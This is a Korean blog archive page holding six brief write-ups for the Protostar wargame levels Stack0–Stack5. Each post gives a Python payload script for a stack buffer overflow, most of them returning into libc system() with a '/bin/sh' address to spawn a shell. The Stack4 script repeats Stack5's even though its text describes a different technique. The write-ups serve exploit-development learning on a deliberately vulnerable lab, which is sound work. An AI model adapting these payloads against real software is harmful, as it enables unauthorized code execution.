'Wargame/Protostar:Exploit-Exercises' 카테고리의 글 목록 (2 Page)

Wargame/Protostar:Exploit-Exercises

[Protostar : Exploit-Exercises] Stack5 2016.09.24
[Protostar : Exploit-Exercises] Stack4 2016.09.24
[Protostar : Exploit-Exercises] Stack3 2016.09.24
[Protostar : Exploit-Exercises] Stack2 2016.09.24
[Protostar : Exploit-Exercises] Stack1 2016.09.24
[Protostar : Exploit-Exercises] Stack0 2016.09.24

[Protostar : Exploit-Exercises] Stack5

2016. 9. 24. 06:34

이번엔 그냥 쉘을 따는게 목표네요.

#coding: utf-8
from struct import pack, unpack

p = lambda x: pack("<L", x)
up = lambda x: pack("<L", x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf
win = 0x80483f4

payload = 'A'*76
payload += p(system)
payload += 'B'*4
payload += p(binsh)

print payload

stack5.py

따줍시다.

저작자표시 비영리 동일조건

'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글

[Protostar : Exploit-Exercises] Stack7 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack6 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack4 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack3 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack2 (0)	2016.09.24

[Protostar : Exploit-Exercises] Stack4

2016. 9. 24. 06:27

이번에는 코드 플로우를 바꿔보라고 합니다.

ret를 win 함수의 주소로 바꿔줍시다.

#coding: utf-8
from struct import pack, unpack

p = lambda x: pack("<L", x)
up = lambda x: pack("<L", x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf
win = 0x80483f4

payload = 'A'*76
payload += p(system)
payload += 'B'*4
payload += p(binsh)

print payload

stack4.py

쉘도 따줍시다.

저작자표시 비영리 동일조건

'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글

[Protostar : Exploit-Exercises] Stack6 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack5 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack3 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack2 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack1 (0)	2016.09.24

[Protostar : Exploit-Exercises] Stack3

2016. 9. 24. 06:09

이번엔 함수포인터를 바꿔주랍니다.

바꿔줍시다.

#coding: utf-8
from struct import pack, unpack

p = lambda x: pack("<L", x)
up = lambda x: unpack("<L",x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf
win = 0x8048424

payload = 'A'*64
payload += p(win)
payload += 'A'*12
payload += p(system)
payload += 'AAAA'
payload += p(binsh)

print payload

stack3.py

쉘도 따줍시다.

저작자표시 비영리 동일조건

'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글

[Protostar : Exploit-Exercises] Stack5 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack4 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack2 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack1 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack0 (0)	2016.09.24

[Protostar : Exploit-Exercises] Stack2

2016. 9. 24. 05:13

이번에는 환경변수로 입력 받은 값을 buffer에 집어넣어주네요.

넣어줍시다.

대신, 0x0a, 0x0d의 경우 개행을 나타내는 hex value이기 때문에 double quotation으로 한번 더 묶어줍시다.

#coding: utf-8
from struct import pack, unpack

p = lambda x: pack("<L", x)
up = lambda x: unpack("<L",x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = 'A'*84
payload += p(system)
payload += 'AAAA'
payload += p(binsh)

print payload

stack2.py

쉘도 따줍시다.

저작자표시 비영리 동일조건

'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글

[Protostar : Exploit-Exercises] Stack5 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack4 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack3 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack1 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack0 (0)	2016.09.24

[Protostar : Exploit-Exercises] Stack1

2016. 9. 24. 04:52

이번에는 0,1이 아닌 특정 4바이트 값으로 바꿔야하네요.

#coding: utf-8
from struct import pack, unpack

p = lambda x: pack("<L", x)
up = lambda x: unpack("<L",x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = 'A'*80
payload += p(system)
payload += 'AAAA'
payload += p(binsh)

print payload

stack1.py

값도 바꿔보고, 쉘도 따봅니다.

저작자표시 비영리 동일조건

'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글

[Protostar : Exploit-Exercises] Stack5 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack4 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack3 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack2 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack0 (0)	2016.09.24

[Protostar : Exploit-Exercises] Stack0

2016. 9. 24. 04:43

졸리다..

그냥 modified의 값을 바꾸면 되나 봅니다.

바꿔줍시다.

이 바이너리에는 더미바이트가 따로 없나보네요. buf 이후에 1바이트만 덮어 씌워 줘도 modified 변수가 바뀌네요.

쉘도 따봅니다.

#coding: utf-8
from struct import pack, unpack

p = lambda x: pack("<L", x)
up = lambda x: unpack("<L",x)[0]

system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = 'A'*80
payload += p(system)
payload += 'AAAA'
payload += p(binsh)

print payload

이런식으로 pack 해서 보낼수도 있다고 합니다.

그래서 이것도 해봤습니다.

저작자표시 비영리 동일조건

'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글

[Protostar : Exploit-Exercises] Stack5 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack4 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack3 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack2 (0)	2016.09.24
[Protostar : Exploit-Exercises] Stack1 (0)	2016.09.24

PREV 1 2 NEXT

choiys